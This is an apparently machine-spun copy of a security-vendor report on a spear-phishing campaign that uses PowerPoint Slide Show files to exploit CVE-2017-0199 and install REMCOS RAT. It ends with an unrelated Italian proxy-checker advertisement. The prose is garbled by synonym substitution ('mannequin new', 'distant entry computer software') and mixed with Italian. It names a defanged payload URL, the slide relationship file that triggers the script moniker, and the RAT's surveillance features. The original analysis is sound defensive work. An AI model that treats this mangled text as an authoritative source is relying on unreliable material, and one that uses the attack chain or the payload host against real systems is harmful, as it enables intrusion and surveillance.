By Ronnie Giagone and Rubio Wu
CVE-2017-0199 was initially a zero-day distant code execution vulnerability that allowed attackers to use a flaw that exists inside the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to ship malware. It is usually exploited through the utilization of malicious Rich Text File (RTF) documenti, a method utilized by the DRIDEX banking trojan found earlier this year.
We at present noticed a mannequin new pattern (Detected by Trend Micro as TROJ_CVE20170199.JVU) exploiting CVE-2017-0199 using a mannequin new methodology that abuses PowerPoint Slide Showâthe first time we now have seen this method used inside the wild before. As which will not be the predominant time that CVE-2017-0199 was exploited for an attack, we thought it becoming to examine this new assault methodology to current some perception into how this vulnerability is liable to be abused by fully different campaigns inside the future.
Figura 1: Infection move for TROJ_CVE20170199.JVU
The exploit arrives as a spear-phishing piece of email attachment, purportedly from a cable manufacturing provider, that drops a distant entry computer software as its remaining payload. This is smart as we now have noticed these assaults primarily focusing on corporations involved inside the electronics manufacturing industry. We take into account the focused assault includes the utilization of a sender tackle disguised as a reliable piece of email despatched by a enterprise partner.
The content material of the e-mail pattern seems to be like this:
Figura 2: Sample spear-phishing email
While the e-mail itself mentions one factor about an order request, the person who receives this piece of email will not be going to get your hands on enterprise paperwork attached, however reasonably a PPSX file that reveals the subsequent when clicked:
Figura 3: Screenshot of the PPSX file that abuses CVE-2017-0199
When the malicious PowerPoint Show is opened, it reveals the textual content material CVE-2017-8570, which is a distinct Microsoft Office vulnerability. Tuttavia, based mostly on our analysis, it truly exploits CVE-2017-0199 instead. This is a leftover mistake from the toolkit developer, which the sender did not decide to change.
The file triggers a script moniker in ppt/slides/_rels/slide1[.]xml[.]rels. The exploit runs the distant code at hxxp://192[.]166[.]218[.]230:3550/logo[.]doc, which is a VPN or internet hosting service that is abused by the attacker.
Figura 4: The payload hyperlink to distant malicious code embedded in ppt/slides/_rels/slide1.xml.rels.
If we run the sample, PowerPoint will initialize the script moniker and run the distant malicious payload through the PowerPoint Show animations feature.
Based on the screenshot below, we will see that after the flaw is effectively exploited, it is going to receive the file logo.doc (Detected by Trend Micro as JS_DLOADER.AUSYVT) from the internet.
Figura 5: Successfully downloading the logo.doc file
Figura 6: The logo.doc will not be a doc file however an XML which will receive RATMAN.EXE
Examining Ratman.EXE aka REMCOS RAT
Originally, the REMCOS RAT is a reliable and customizable distant entry computer software that lets a person administration a system from wherever inside the world. Once REMCOS is executed, it is going to current the perpetrator the power to run distant instructions on the userâs system. The tool’s capabilities is liable to be seen inside the Control Panel screenshot below, giving us an idea of what it would do as quickly as it enters a userâs system. The toolâs capabilities are pretty comprehensive, and contains a receive & execute command, a keylogger, a display logger, and recorders for every webcam and microphone.
Figura 7: Screenshot of the REMCOS RAT Control Panel
While the REMCOS builder typically solely contains compression using UPX and MPRESS, the trojanized pattern we acquired makes use of an unknown .NET protector, which incorporates a quantity of protections and obfuscations to make it tougher for researchers to reverse.
Figura 8: The sampleâs obfuscation code
After unpacking, the strings from the unpacked pattern reveal the mannequin of the REMCOS shopper it was constructed from.
Figura 9: Unpacked pattern strings
REMCOS makes use of encrypted communication, collectively with a hardcoded password for its authentication and community visitors encryption. So to make sure that that RATMAN.EXE to converse with its client, the ports and passwords ought to be set accordingly.
Figura 10: Using the REMCOM RAT tool
Ultimately, the utilization of a mannequin new methodology of assault is a sensible consideration; since most detection strategies for CVE-2017-0199 focuses on the RTF methodology of attack, the utilization of a mannequin new vectorâPPSX filesâallows attackers to evade antivirus detection.
Di mitigazione e di Trend Micro Soluzioni
Cases like this spotlight the want for prospects to be cautious when opening information or clicking hyperlinks of their emailsâeven in the event that they arrive from seemingly reliable sources. Spear phishing makes an try is liable to be reasonably sophisticated, and as seen with this example, can trick most prospects into downloading malicious files. By implementing right mitigation methods in the direction of phishing attacks, prospects can forestall malware that make the most of emails from infecting them inside the predominant place.
Users additionally should on a daily basis patch their methods with the latest safety updates. Given that Microsoft already addressed this vulnerability again in April, prospects with up thus far patches are safe from these attacks.
In addition to implementing efficient mitigation techniques, the utilization of a multilayered decision reminiscent of Trend Microâ¢ Deep Discoveryâ¢ will assist current detection, l'analisi in profondità, and proactive response to todayâs stealthy malware, and focused assaults in real-time. It presents a full protection tailored to shield organizations in the direction of focused assaults and superior threats through specialised engines, personalized sandboxing, and seamless correlation throughout all of the assault lifecycle.
Trend Microâ¢ Deep Securityâ¢ and Vulnerability Protection current virtual patching that protects endpoints from threats that abuses vulnerabilities. OfficeScanâs Vulnerability Protection defend endpoints from recognized and unknown vulnerability exploits even earlier than patches are deployed.
CVE-2017-0199: ne of the New Malware Abuses PowerPoint Slide Show
Si prega di controllare questo grande servizio al: http://www.test-net.org/services/proxy-checker/ o visitare GRATUITAMENTE i SERVIZI di menu